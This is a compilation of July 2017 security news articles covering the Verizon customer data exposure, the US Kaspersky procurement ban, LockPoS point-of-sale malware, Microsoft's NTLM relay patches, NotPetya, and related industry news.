BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


Verizon Downplays Leak of Millions of Customer Records

13.7.2017 securityweek Incindent

The personal details of millions of Verizon customers were exposed online due to a misconfigured Amazon Web Services (AWS) S3 bucket operated by a third-party vendor, but the telecoms giant has downplayed the incident.

Cyber resilience firm UpGuard reported on Wednesday that its researchers discovered an unprotected AWS S3 bucket containing information on as many as 14 million Verizon customers, including names, addresses, phone numbers, PINs used for identity verification purposes, customer satisfaction data, and service purchases.

The data, which appears to represent daily logs collected over the first six months of 2017, was not exposed by Verizon itself, but by NICE Systems, an Israel-based partner that provides call center services. UpGuard reported the leak to Verizon on June 13, but the exposed database was only protected on June 22.

“Beyond the sensitive details of customer names, addresses, and phone numbers—all of use to scammers and direct marketers—the prospect of such information being used in combination with internal Verizon account PINs to takeover customer accounts is hardly implausible. To do so would enable impersonators to tell Verizon call center operators to do whatever was wished of them,” UpGuard said in a blog post.

Verizon data leak

In a statement published on its corporate website, Verizon downplayed the incident, claiming that the details of only 6 million unique customers were exposed. The company blamed the leak on human error, and pointed out that no one other than UpGuard had accessed the unprotected cloud storage area.

“The overwhelming majority of information in the data set had no external value, although there was a limited amount of personal information included, and in particular, there were no Social Security numbers or Verizon voice recordings in the cloud storage area,” Verizon said.

“To further clarify, the data supports a wireline portal and only includes a limited number of cell phone numbers for customer contact purposes. In addition, to the extent PINs were included in the data set, the PINs are used to authenticate a customer calling our wireline call center, but do not provide online access to customer accounts,” the company added.

Experts believe this is a serious incident, even if no one else downloaded the data from the cloud storage.

“Sure, a mid-air miss is better than an air flight disaster, but neither should ever happen,” John Gunn, chief marketing office for VASCO Data Security, told SecurityWeek. “Data such as this can be used by hackers for all types of attacks, especially phishing attacks, by giving them legitimacy in the mind of the victim. We saw this recently with the DocuSign breach and the subsequent successful attacks against their users.”

Willy Leichter, vice president of marketing at Virsec, believes “this will be a heated board-level issue for a $1 billion company like Nice, and a $125 billion-plus company like Verizon.”

“If the European General Data Protection Regulation (GDPR) was in effect (it is starting in May 2018) there could be a fine as large at $5 billion (4% of annual revenue) for this single incident,” Leichter said.


US Government limits purchase of Kaspersky Lab solutions amid concerns over Russia ties
13.7.2017 securityaffairs BigBrothers

The US General Services Administration announced that the security firm Kaspersky Lab has been deleted from lists of approved vendors.
The US government bans Kaspersky solutions amid concerns over Russian state-sponsored hacking. Federal agencies will not buy software from Kaspersky Lab due to its alleged links to the Russian intelligence services.

This week, a Bloomberg News report, claimed internal company emails show that Kaspersky has a strict relationship with Russia secret services FSB.

The General Services Administration (GSA), which is the organization that handles federal government purchasing contracts, announced that cyber security firm Kaspersky Lab has been removed from the list of approved vendors.

“GSA’s priorities are to ensure the integrity and security of US government systems and networks and evaluate products and services available on our contracts using supply chain risk management processes,” reads the statement issued by the General Services Administration.

The decision doesn’t surprise the IT security industry, the US intelligence and Government officials have expressed concerns about the adoption of Kaspersky software several times.

It is important to highlight that the ban is not total, Government agencies will still be able to use Kaspersky software purchased separately from the GSA contract process.

According to the Reuters,

The company said in a statement to AFP , it had not received any updates from GSA or any other U.S. government agency regarding its vendor status.

“Kaspersky Lab has no ties to any government, and the company has never helped, nor will help, any government in the world with its cyberespionage efforts,” the company said.

It added that it had been “caught in the middle of a geopolitical fight where each side is attempting to use the company as a pawn in their political game.”

Kaspersky added that “the company is being unjustly accused without any hard evidence to back up these false allegations.”

Kaspersky on Tuesday published statement in response to the Bloomberg’s report.

“While the U.S. government hasn’t disclosed any evidence of the ties, internal company emails obtained by Bloomberg Businessweek show that Kaspersky Lab has maintained a much closer working relationship with Russia’s main intelligence agency, the FSB, than it has publicly admitted.”

“Actually, the reported emails show no such link, as the communication was misinterpreted or manipulated to try to make the media outlet’s narrative work. Kaspersky Lab is very public about the fact that it assists law enforcement agencies around the world with fighting cyberthreats, including those in Russia, by providing cybersecurity expertise on malware and cyberattacks.” states Kaspersky.

“Kaspersky Lab regularly cooperates with law enforcement agencies, industry peers and victims of cybercrime.”

In May, the Senate Armed Services Committee passed a defense spending policy bill that would ban Kaspersky products from use in the US military. The decision was taken a day after the FBI interviewed several of the company’s U.S. employees at their private homes as part of a counterintelligence investigation into its operations.

“In May senior U.S. intelligence officials said in testimony before the Senate Intelligence Committee that they were reviewing government use of software from Kaspersky Lab.” reported the Reuters Agency.

“Lawmakers raised concerns that Moscow might use the firm’s products to attack American computer networks, a particularly sensitive issue given allegations by U.S. intelligence agencies that Russia hacked and leaked emails of Democratic Party political groups to interfere in the 2016 presidential election campaign. Russia denies the allegations.”


New PoS Malware LockPoS emerges in the threat landscape
13.7.2017 securityaffairs
Virus

A newly discovered Point of Sale (PoS) malware dubbed LockPoS appeared in the wild and it is being delivered through the Flokibot botnet.
A newly discovered Point of Sale (PoS) malware is being delivered via a dropper that is manually loaded and executed on the targeted systems, Arbor Networks Security researchers warn.

Arbor Networks researchers discovered a new Point of Sale (PoS) malware, dubbed LockPoS, in the threat landscape.

LockPoS uses command and control (C&C) infrastructure used by the Flokibot against Brazilian users.

The Floki bot is a banking Trojan based on Zeus that has been sold on cybercrime underground since September 2016. The malware was developed starting from the Zeus source code that was leaked in 2011, it is offered for $1,000 worth of bitcoins.

The experts from Flashpoint who discovered it in the wild in December speculated that the Floki Bot has a Brazilian origin, the threat actor behind the malware was using the “flokibot” moniker and communicated in Portuguese. It targeted Brazilian IPs and domains and targeted systems having default language set to Portuguese.

The LockPoS the malware has been compiled in late June and to use a dropper that injects the malicious code directly into the explorer.exe process.

The malware has to be manually loaded and executed, then the dropper continues by extracting a resource file from itself that contains multiple components that are injected into explorer.exe. and that works as a second-stage loader. Next, the malicious code decrypts, decompresses, and loads the final LockPoS payload.

LockPoS implements a regular “registry run” method for persistence and obfuscates important strings using XOR and a key of “A”.

“LockPoS uses the regular “registry run” method for persistence. It obfuscates important strings using XOR and a key of “A”. An initial configuration (which includes the C2 URL) is stored unencrypted as a resource named “XXXX”:” states the analysis.

“C2 communications are via HTTP and using a very telling User-Agent. “

The malware’s communication with the C&C server via HTTP,once infected a machine, it sends back to the server several information including username, computer name, and bot ID, Bot version (1.0.0.6), CPU, Physical memory, Display devices, Windows version and architecture, and MD5 hash of currently running sample.

“The malware’s PoS credit card stealing functionality works similarly to other PoS malware: it scans the memory of other running programs looking for data that matches what credit card track data looks like. Here’s a snippet of the matching function,” continues the analysis.

LockPoS

The LockPoS has been distributed via a Flokibot botnet, it is likely by the same threat actors that is focused on Brazilian users.

Experts highlighted that hackers used the same C&C at treasurehunter[.]at was used in another PoS malware campaign spotted by FireEye last year and tracked as TreasureHunt.

Arbor Networks explained that the LockPoS is a totally different malware family from TREASUREHUNT.

“One thing to note about the analyzed C2 server (treasurehunter[.]at) is that there is a name overlap with another PoS malware that FireEye wrote about in 2016 called TREASUREHUNT. Based on their research on its C2 communications, panel, and other IoCs it looks like LockPoS and TREASUREHUNT are separate families.”

“It is currently unclear whether LockPoS is an exclusive malware associated with one threat actor or whether it will be sold on underground forums like Flokibot was.’, continues the analysis.


More than 14 Million Verizon Customers’ records exposed by a third party firm
13.7.2017 securityaffairs Incindent

Data belonging to 14 million U.S.-based Verizon customers have been exposed on an unprotected AWS Server by a partner of the telecommunications company.
The notorious security expert Chris Vickery, UpGuard director of cyber risk research. as made another disconcerting discovery, more than 14 million US customers’ personal details have been exposed after the third-party vendor NICE left the sensitive records open on an unprotected AWS Server.
NICE Systems is an Israeli firm that offers several solutions for intelligence agencies, including telephone voice recording, data security, and surveillance systems.

Exposed data also revealed that NICE Systems has a partnership with Paris-based telecommunication company “Orange,” it seems that the third-party firm collects customer details across Europe and Africa.

“The data repository, an Amazon Web Services S3 bucket administered by a NICE Systems engineer based at their Ra’anana, Israel headquarters, appears to have been created to log customer call data for unknown purposes;” reads a blog post published by Vickery. “Verizon, the nation’s largest wireless carrier, uses NICE Systems technology in its back-office and call center operations. In addition, French-language text files stored in the server show internal data from Paris-based telecommunications corporation Orange S.A.—another NICE Systems partner that services customers across Europe and Africa.”

verizon data breach-leak
The exposed data are sensitive information of millions of customers, including names, phone numbers, and account PINs (personal identification numbers).

The huge trove of data is related to the customers’ calls to the Verizon’s customer services in the past 6 months.

“Beyond the risks of exposed names, addresses, and account information being made accessible via the S3 bucket’s URL, the exposure of Verizon account PIN codes used to verify customers, listed alongside their associated phone numbers, is particularly concerning.” continues the expert, “Possession of these account PIN codes could allow scammers to successfully pose as customers in calls to Verizon, enabling them to gain access to accounts—an especially threatening prospect, given the increasing reliance upon mobile communications for purposes of two-factor authentication.”

It is still unclear why Verizon allowed NICE to collect call details, experts speculate the third party vendor was tasked to monitor the efficiency of its call-center operators for Verizon.
The incident demonstrates the risks of third-party vendors handling sensitive data. UpGuard pointed out the long interval of time between the initial notification to Verizon by UpGuard (June 13th) to the closure of the breach (on June 22nd)

“Finally, this exposure is a potent example of the risks of third-party vendors handling sensitive data,” reads the blog post from UpGuard.
“NICE Systems’ history of supplying technology for use in intrusive, state-sponsored surveillance is an unsettling indicator of the severity of this breach of privacy.”

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak, in June 2017 Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.


MS Patch Tuesday fixes 19 critical issues, including two NTLM zero-day flaws
13.7.2017 securityaffairs
Vulnerebility

As part of the Microsoft Patch Tuesday, the tech giant fixed two critical flaws in Windows NTLM Security Protocol. Users must apply the patch asap.
As part of the July Patch Tuesday, Microsoft has released security patches for a serious privilege escalation flaw affecting all Windows operating system versions for enterprises released since 2007.

Experts at Security firm Preempt, discovered two zero-day flaws that affect Windows NTLM security protocols. The vulnerabilities could be exploited by attackers to create a new domain administrator account and take over the target domain.

The NT LAN Manager (NTLM) is an ancient authentication protocol, despite it was replaced by Kerberos in Windows 2000, it is still supported by Microsoft and it is used by many organizations.

NTLM flow

The first flaw involves unprotected Lightweight Directory Access Protocol (LDAP) from NTLM relay, and the second is related to the Remote Desktop Protocol (RDP) Restricted-Admin mode.

Even if LDAP signing protects from both Man-in-the-Middle (MitM) and credential forwarding, the protocol is not able to fully protect against NTLM relay attacks,

The vulnerability could be exploited by an attacker with SYSTEM privileges to use incoming NT LAN Manager sessions and perform the LDAP operations, including the updating of domain objects.

“This allows an attacker with SYSTEM privileges on a machine to use any incoming NTLM session and perform the LDAP operations on behalf of the NTLM user.” reads a blog post published by Preempt.

“To realize how severe this issue is, we need to realize all Windows protocols use the Windows Authentication API (SSPI) which allows downgrade of an authentication session to NTLM.As a result, every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network.”

The second NTLM vulnerability affects the RDP Restricted-Admin mode that allows users to access to a remote machine without providing their password.

According to Preempt researchers, the RDP Restricted-Admin allows authentication systems to downgrade to NTLM.

This means that it is possible to perform NTLM relay attacks and password cracking against the RDP Restricted-Admin.

“Preempt discovered that RDP Restricted-Admin, which is sometimes referred to (mistakenly) as Kerberosed RDP, allows downgrade to NT LAN Manager in the authentication negotiation. This means that every attack you can perform with NTLM such as credential relaying and password cracking could be carried out against RDP Restricted-Admin.” continues the analysis.

Chaining the two zero-days, an attacker could create a bogus domain admin account whenever an admin connects with RDP Restricted-Admin and get control of the entire domain.

The NTLM flaws have been reported to Microsoft in April, but the company only acknowledged a month later the NTLM LDAP vulnerability (tracked as CVE-2017-8563). Microsoft did not recognize RDP bug, the tech giant classified it as a “known issue” that could be solved with a proper configuration of the network.

Microsoft recommends companies running vulnerable servers with NT LAN Manager enabled to patch them as soon as possible.

Other mitigation actions are:

turning NT LAN Manager off.
requiring that incoming LDAP and SMB packets are digitally signed in order to prevent credential relay attacks.
Microsoft has released patches for 55 security vulnerabilities, including 19 critical issues, in its products, including Edge, Internet Explorer, Windows, Office and Office Services and Web Apps, .NET Framework, and Exchange Server.


Following NotPetya NATO Increases Support for Ukraine’s Cyber Defenses
13.7.2017 securityaffairs BigBrothers

Following the massive NotPetya attack, NATO Increases Support for Ukrainian Cyber Defenses, Ukraine Considers Joining NATO.
“Critical Infrastructure” is one of the most sensitive elements of any country’s economy. Recent attacks against Ukraine’s infrastructure have many other countries taking note and have encouraged NATO to pitch in and help bolster Ukrainian cyber defenses.

In December 2015, Ukrainian power grid operators watched helplessly as hackers remotely logged into three power distribution centers and turned off power to over 230,000 residents. The hackers had started their plans many months earlier by sending carefully crafted phishing emails to key IT staff working for the target companies. The malicious attachments to these emails allowed the bad guys to gain a foothold in the networks and over the subsequent months they carefully gathered information and improved their remote capabilities until it was time to strike. Attribution is difficult, but given the patience and approaches demonstrated by the bad guys it is obvious that they are sophisticated and many people are pointing their finger at Russian-linked hacking groups.

Ukraine notpetya Petwrap ransomware

More recently, in June 2017, a ransomware attack was launched in Ukraine impacting transportation, banking and power infrastructure. Believed to be the Petya ransomware variant, the attack spread beyond the original targets and became a worldwide problem that has directly cost millions of dollars in lost production for many companies as well as untold costs in remediation and recovery efforts. As investigators began to dig deeper into the Petya attack it appears that it was only masquerading as ransomware. The primary function of ransomware is to generate revenue for the bad guys. However, this attack had a clunky mechanism for gathering the ransom so it appears its primary function was something else. Most experts now agree that this was another attack intended to disrupt Ukrainian infrastructure and have dubbed it the NotPetya attack. Again attribution is uncertain, but Russian-linked groups are suspected.

All other countries are keeping a close watch on these developments. It is reported that critical infrastructure protections in Ukraine are better than many other countries’ so it is conceivable that these same attacks will eventually be turned against new targets. In a demonstration of solidarity — and likely a lot of self-interest — NATO has agreed to provide Ukraine with support and equipment to “help Ukraine investigate who is behind the different attacks,” according to NATO secretary-general Jens Stoltenberg. In December 2014 NATO established the Cyber Defence Trust Fund with a mandate “to provide Ukraine with the necessary support to develop its strictly defensive, CSIRT-type technical capabilities, including laboratories to investigate cyber security incidents.” Since June 2016, €965,000 has been contributed by eight countries and while this helped to bolster Ukrainian cyber defenses, it is obvious that it isn’t enough.

Speaking on the topic of Ukraine formally joining the NATO union at a joint press conference with NATO on Monday, Ukrainian President Petro Poroshenko said,

“Today we clearly stated that we would begin a discussion about a membership action plan and our proposals for such a discussion were accepted with pleasure.”

Given the recent cyber attacks’ rumored source as Russian-linked hacking groups, the ongoing tensions between Russia and Ukraine as well Russia’s public stance against any NATO expansion this is unlikely to calm things down in the region. But with the sophistication of the cyber attacks and the apparent disregard for global impacts beyond Ukrainian borders, it is impractical for other countries to sit on the sidelines and let Ukraine attempt to protect themselves.


LockPoS Point of Sale Malware Emerges

12.7.2017 securityweek Virus

A newly discovered Point of Sale (PoS) malware is being delivered via a dropper that is manually loaded and executed on the targeted systems, Arbor Networks Security researchers warn.

The new threat was associated with command and control (C&C) servers used by Flokibot in a campaign targeting Brazil. Dubbed LockPoS, the malware appears to have been compiled in late June and to use a dropper that injects it directly into the explorer.exe process.

After being manually loaded and executed, the dropper continues by extracting a resource file from itself. The resource contains multiple components that are injected into explorer.exe and which act as a second-stage loader. Next, it starts decrypting, decompressing, and loading the final LockPoS payload.

While analyzing the malware, Arbor Networks researchers discovered it uses a regular “registry run” method for persistence. The malware obfuscates important strings using XOR and a key of “A”. It also stores an initial configuration unencrypted as a binary structure.

The malware’s communication with the C&C server is performed via HTTP, using a very telling User-Agent. Information sent to the server includes username, computer name, and bot ID, Bot version (1.0.0.6), CPU, Physical memory, Display devices, Windows version and architecture, and MD5 hash of currently running sample.

“The malware’s PoS credit card stealing functionality works similarly to other PoS malware: it scans the memory of other running programs looking for data that matches what credit card track data looks like. Here’s a snippet of the matching function,” the security researchers explain.

Until now, the new malware has been distributed via a Flokibot botnet, and, with both threats sharing a common C&C server, the researchers believe that same threat actor controls both of them. Because the Flokibot campaign associated with the server was targeting Brazil, the researchers believe LockPoS will target the same country as well.

Although the same C&C at treasurehunter[.]at was used in another PoS malware campaign in what FireEye referred to last year as TREASUREHUNT, Arbor Networks says that LockPoS is a different malware family from TREASUREHUNT.

“It is currently unclear whether LockPoS is an exclusive malware associated with one threat actor or whether it will be sold on underground forums like Flokibot was. Based on the internals of the malware described in this post, LockPoS seems to be coded well and stable, but doesn’t particularly raise the bar when it comes to ‘highly advanced malware’, the researchers note.


Microsoft Patches LDAP Relay Vulnerability in NTLM

12.7.2017 securityweek Vulnerebility

Microsoft resolved over 50 bugs with its July 2017 set of security patches, one being a vulnerability where the Lightweight Directory Access Protocol (LDAP) wasn’t protected from Microsoft NT LAN Manager (NTLM) relay.

Discovered by the Preempt research team, the LDAP relay attack could be exploited by a hacker to create new domain administrator accounts even when best-practice controls are enabled. A similar attack can be performed by exploiting a RDP relay flaw in NTLM, the security researchers said.

Consisting of a series of security protocols aimed at offering authentication, integrity, and confidentiality, NTLM relay is one of the main attack vectors for hackers and pen-testers, Preempt argues.

The basic manner in which NTLM works is that the user encrypts a server-issued challenge with their password hash to establish a connection. An attacker able to use the challenge in a parallel session with the server needs to forward “the same encrypted hash to create a successful NTLM authentication” and use this to open a session (such as SMB) and infect the target system with malware.

Countermeasures preventing NTLM credential relay include SMB signing – where a derived session key is used to digitally sign all incoming packets, thus preventing server exploitation even if the NTLM session was relayed; and Enhanced Protection for Authentication (EPA) – where the client signs an element of the TLS session with the derived session key, thus protecting the server from credential relaying.

“LDAP protocol is used in Active Directory to query and update all domain objects. There is a special configuration in the Group Policy Object (GPO) - Domain Controller: LDAP server signing requirements. When this GPO is set to Require Signing the domain controller rejects LDAP sessions that are not either digitally signed with a derived session key or the entire session is encrypted over TLS (LDAPS),” Preempt’s Yaron Zinar explains.

Tracked as CVE-2017-8563, the vulnerability resides in LDAPS not having protection for credential forwarding, although it does protect from Man-in-the-Middle (MitM) attacks, the same as LDAP signing.

“This allows an attacker with SYSTEM privileges on a machine to use any incoming NTLM session and perform the LDAP operations on behalf of the NTLM user,” Zinar notes.

Because all Windows protocols use the Windows Authentication API (SSPI), which allows for authentication sessions to be downgraded to NTLM, “every connection to an infected machine (SMB, WMI, SQL, HTTP) with a domain admin would result in the attacker creating a domain admin account and getting full control over the attacked network,” the researcher notes.

The second vulnerability Preempt discovered resides in RDP Restricted-Admin, a protocol that allows users to connect to remote machines revealing their password to the machine. RDP Restricted-Admin, the researchers say, allows downgrade to NTLM in the authentication negotiation, meaning that attacks that can be performed with NTLM can be carried out against RDP Restricted-Admin.

“As RDP Restricted-Mode is often used by support technicians with elevated privileges to access remote machines, this puts their credentials at risk of being compromised. Furthermore, when combined with the first LDAP relay issue, this means that each time an admin connected with RDP Restricted-Admin an attacker was able to create a rogue domain admin,” Zinar says.

Although RDP Restricted-Mode was previously found to allow attackers to connect to remote machines using pass-the-hash, Microsoft told Preempt that the vulnerability was a known issue, and “recommended configuring network to be safe from any sort of NTLM relay.”


U.S. Bans Kaspersky Software Amid Concerns Over Russia Ties

12.7.2017 securityweek BigBrothers

Washington - The US government has moved to block federal agencies from buying software from Russia-based Kaspersky Lab, amid concerns about the company's links to intelligence services in Moscow.

The General Services Administration, which handles federal government purchasing contracts, said in a statement to AFP that Kaspersky Lab, a major global provider of cybersecurity software, has been removed from its list of approved vendors, making it more difficult to obtain Kaspersky products.

"GSA's priorities are to ensure the integrity and security of US government systems and networks and evaluate products and services available on our contracts using supply chain risk management processes," the agency said in a statement.

The action came weeks after top US intelligence agency and law enforcement officials publicly expressed concerns about use of Kaspersky software.

The officials, appearing at a congressional hearing in May, stopped short of offering specifics but appeared to suggest concerns over the computer security firm's alleged links to Russian defense and intelligence bodies.

The company said in a statement to AFP Wednesday, "Kaspersky Lab has no ties to any government, and the company has never helped, nor will help, any government in the world with its cyberespionage efforts."

It added that "the company is being unjustly accused without any hard evidence to back up these false allegations."

A Bloomberg News report this week meanwhile claimed internal company emails show that Kaspersky has maintained a closer working relationship with Russia's main intelligence agency, the FSB, than it has publicly admitted.

Kaspersky on Tuesday issued a statement disputing the Bloomberg accounting, saying "the communication was misinterpreted or manipulated," but did acknowledge that it "regularly cooperates with law enforcement agencies, industry peers and victims of cybercrime."

The company has repeatedly denied working with any government agency, and Russia-born founder Eugene Kaspersky has on several occasions sought to counter any such allegations.

In a June 30 blog post, Kaspersky wrote, "For some reason the assumption continues to resonate that since we're Russian, we must also be tied to the Russian government. But really, as a global company, does anyone seriously think we could survive this long if we were a pawn of ANY government?"


Apple Builds Data Center in China, Promises No Backdoors

12.7.2017 securityweek  Apple

Apple opens data center in China - Image Credits: flickr.com/photos/nez

Apple on Wednesday announced the establishment of its first China-based data center in an effort to improve its services in the region and comply with recently implemented regulations, but the tech giant has promised not to build any backdoors into its systems.

The new data center is located in China’s Guizhou province, which Apple selected following a “careful study” – the company said it was impressed with the local government’s leadership and its focus on environmental sustainability. Officials from the Guizhou province visited Silicon Valley last year to promote big data opportunities as part of a pilot program.

“In partnership with a local internet services company, Guizhou on the Cloud Big Data, we’re proud of the fact the facility will be fully powered by 100 percent renewable energy like all of our other data centers around the world,” Apple said in a statement sent to SecurityWeek.

"Our Chinese customers love using iCloud to store their photos, videos, documents and apps securely, and to keep them updated across all of their devices. We're committed to continuously improving the user experience, and the addition of this data center will allow us to improve the speed and reliability of our products and services while also complying with newly passed regulations,” Apple added.

The said cybersecurity regulations, adopted last year and implemented on June 1, impose new rules for online services providers. Trade groups opposed the initiative – whose initial version even required companies to submit source code for verification – arguing that it offered an unfair advantage to Chinese businesses.

The new law is largely focused on protecting China’s networks and private user information, and it requires cloud services to be operated by local companies. As a result, Apple has teamed up with government-owned Guizhou-Cloud Big Data to offer its iCloud service.

While some may be concerned about the location of the data center given the Chinese government’s track record, Apple has promised to maintain its strong data privacy and security protections and not create any backdoors into its systems.

Apple’s announcement comes just weeks after Chinese authorities reported uncovering a massive underground operation run by Apple employees who had abused the company’s internal systems to collect and sell customers’ personal details.


Edgewise Networks Emerges From Stealth to Bring Zero Trust Networking to the Data Center

12.7.2017 securityweek Security

Burlington, MA-based Edgewise Networks has emerged from stealth mode with a product designed to implement a zero-trust approach to network security.

Founded by Peter Smith and Harry Sverdlove in Spring 2016; backed by venture capital firms .406 Ventures, Accomplice, and Pillar; and supported by Patrick Morley (CEO of Carbon Black), Omar Hussain (CEO of Imprivata), Brian Ahern (CEO of Threat Stack), and Bob Brennan (CEO of Veracode), Edgewise seeks to augment perimeter firewalls and improve on microsegmentation.

Edgewise believes that there is a fundamental flaw in defense-by-firewall. While firewalls can detect and block known bad addresses, they cannot detect bad use of good addresses. This means that any compromise of a 'good' address can allow an attacker straight through the firewall, by policy, and into an attack position.

"There are two commonalities in almost all publicized attacks," comments co-founder Peter Smith. "Firstly, attackers rarely, if ever, enter a network directly on their ultimate target: they gain a foothold, surveil the attack surface and then move laterally to where they can conduct the final attack. Secondly, they invariably accomplish this by introducing malicious code at some stage -- for C&C, for the next stage of the attack, and so on."

Preventing the lateral movement is where firewalls fail. They can see where traffic is coming from, and they can see where it is going; but they cannot see who is in control of the software being used, or the server from which it comes. Consider NotPetya, he said. "The worm spread more or less unabated because the firewalls could not detect any maliciousness in the traffic."

Microsegmentation is an improvement on perimeter firewalls alone; but is still not adequate. "Essentially, it forces all traffic through the firewall. Beside the complexity of installation and management, the firewalls still cannot prevent the attacks because they can still only protect what they can see; and despite the fact that they can see all of the network traffic, they can only look at the traffic to identify malicious behavior -- they cannot look outside of the traffic, cannot look at the hosts to see what software is actually making those communications."

Edgewise sees its product as being more effective than complex microsegmentation, and even easier to use than relatively simple next-gen firewalls.

Firewalls, he continued, can only attribute traffic to the address that sent it and the address that receives it. "They cannot see the actual software that created the connection; or the user controlling the application; or the host on which it is running. There is consequently no guarantee that the application you trust is controlled by the user you think should be controlling it. Most new technology just looks more closely at network packets -- but however much you stare at the packet, it will not tell you the identity of the software producing the communication or the user controlling it on either side of the connection."

Two primary aspects of Edgewise illustrate how it operates. Firstly, it ensures that only trusted applications communicate by mutually validating the identity of the underlying software, users and hosts before allowing the connection. "This approach," says the company, "extends the zero-trust networking model that calls for validating application communications and not trusting addresses to secure internal networks."

Secondly, it uses machine-learning to model application communication patterns and generate optimal protection policies automatically. This serves several purposes. It can be used to generate maximum protection from minimum policies, and to produce a policy map that can be used as a 'what-if' model even by non-experts. New policies can be tested on the map to see exactly what effect they will have on the overall network attack surface.

The result, said Smith, "is that we get rid of all of the unnecessary network attack surface that firewalls cannot see. We stop anything that is not trusted and we build the policies for the customer automatically. We have a machine-learning system that analyzes the communication patterns of the software we protect, and then creates the policies to protect the systems. No user intervention is necessary to build the policies -- only to apply them." Which, he added, can be a single click.

"The user sees a map of how the software communicates," he continued. "He can select the software he particularly wishes to protect, and one click will protect it. Only trustworthy software will be allowed to communicate. We also measure the risk associated with the environment -- the attack surface. We measure how much it is, and how much it would shrink if the customer applies our protection."

Edgewise calls this 'Trusted Application Networking'. "It's what Forrester calls zero-trust networking, and what Gartner calls CARTA," said Smith. "Essentially they boil down to the same thing: assert the identity of communicating software and the entities communicating; do not just blindly trust addresses."


Organizations Only Slightly Improved Security Posture: Report

12.7.2017 securityweek Analysis

Organizations made some improvements to their security posture last year, but only marginally, as the average time-to-fix is still too high and remediation rates are too low, according to the 12th annual application security statistics report from WhiteHat Security.

WhiteHat Security’s report is based on dynamic and static testing data collected in 2016 from 15,000 web apps and over 65,000 mobile applications.

The figures show a 25 percent improvement in the average number of vulnerabilities found in web applications – the number dropped from four flaws in 2015 to three flaws in 2016. However, the security firm pointed out that a majority of applications have three or more security holes and nearly half of them are critical.

Looking at the vulnerability profile of each industry, we see that the services sector has the highest number of vulnerabilities, followed by transportation, retail and education.

Vulnerabilities by industry verticals

According to WhiteHat, nearly half of the applications it has tested are vulnerable every single day of the year. In industries such as utilities, retail, accommodations and education, roughly 60 percent of web applications are always vulnerable.

Dynamic security testing conducted by the company showed that the most prevalent vulnerabilities are information leakage, cross-site scripting (XSS), content spoofing, and insufficient transport layer protection. The types of vulnerabilities that are most often found to be critical are SQL injection, XSS, cross-site request forgery (CSRF) and insufficient authorization.

While, as expected, development teams focus on fixing critical and high severity flaws first, low-risk weaknesses are addressed before medium-risk ones.

“Development teams are prioritizing critical software problems first, but then move on to easier fixes,” WhiteHat said in its report. “This is human nature. After patching tricky vulnerabilities, why not knock out a few simple ones?”

The study found that while XSS vulnerabilities are critical 40 percent of the time, developers ignored nearly half of these security holes in 2016. Even SQL injection, which is considered critical in 94 percent of cases, only has a remediation rate of 60 percent.

There have been some improvements in the time it takes software developers to fix a vulnerability – the average number of days dropped from 146 days in 2015 to 129 days in 2016. However, it still took developers, on average, nearly 200 days to patch high severity problems, up from 171 in 2015.

Static testing conducted by WhiteHat showed that insufficient transport layer protection, SQL injection, and unpatched libraries are critical in many cases. However, only less than half of critical bugs are fixed in the development process and make it into production.

In the case of vulnerabilities discovered via static testing, developers seem to focus on issues that are easy to fix and often neglect more severe problems.

The full Application Security Statistics Report, which also includes data on mobile application vulnerabilities, is available in PDF format.


Let's Encrypt Wildcard Certificates a 'Boon' for Cybercriminals, Expert Says

12.7.2017 securityweek Safety

To speed up the adoption of HTTPS, free and open Certificate Authority (CA) Let’s Encrypt will start issuing wildcard certificates as of January 2018.

Created by Mozilla, the University of Michigan, and the Electronic Frontier Foundation (EFF), with Cisco and Akamai as founding sponsors, Let’s Encrypt is pushing for a fully encrypted World Wide Web. The move should help better protect user data from eavesdroppers, but some concerns have been raised about the new offering.

Let’s Encrypt came out of private beta in December 2015 and issued its millionth certificate in March 2016. Last week, the organization announced it had already issued over 100 million security certificates, thus becoming one of the largest CAs by number of issued certificates.

Now, the organization is moving to accelerate HTTPS deployment by starting to issue wildcard certificates, “a commonly requested feature.”

“A wildcard certificate can secure any number of subdomains of a base domain (e.g. *.example.com). This allows administrators to use a single certificate and key pair for a domain and all of its subdomains, which can make HTTPS deployment significantly easier,” Josh Aas, ISRG Executive Director, notes.

Let’s Encrypt’s over 100 million digital certificates are used to secure around 47 million domains, which also benefit from the CA’s fully automated DV certificate issuance and management API. According to Aas, Let’s Encrypt’s service already helped the percentage of encrypted page loads to rise from 40% to 58%.

The organization will be offering wildcard certificates free of charge via an upcoming ACME v2 API endpoint. Only base domain validation via DNS will be supported in the beginning, but the CA may explore additional validation options over time.

“We decided to announce this exciting development during our summer fundraising campaign because we are a nonprofit that exists thanks to the generous support of the community that uses our services. If you’d like to support a more secure and privacy-respecting Web, donate today,” Aas concludes.

Let’s Encrypt’s goal might be improved security and privacy for all users, but it doesn’t mean that its certificates can’t be misused. In March 2017, encryption expert Vincent Lynch revealed that, over a 12-month period, Let’s Encrypt issued over around 15,000 security certificates containing the term PayPal for phishing sites.

According to Kevin Bocek, chief security strategist for Venafi, Let’s Encrypt’s introduction of free wildcard certificates is great for privacy, but a boon for cybercriminals.

“Cybercriminals can create thousands of fake websites using Let’s Encrypt’s wildcard certificates, all with a seemingly trustworthy glowing green padlock in the web browser address field,” Bocek told SecurityWeek. “We have seen bad actors abuse Let’s Encrypt certificates before: more than 14,000 certificates were issued for PayPal phishing websites by Let’s Encrypt, a powerful example of how bad guys exploit Certificate Authority business processes.”

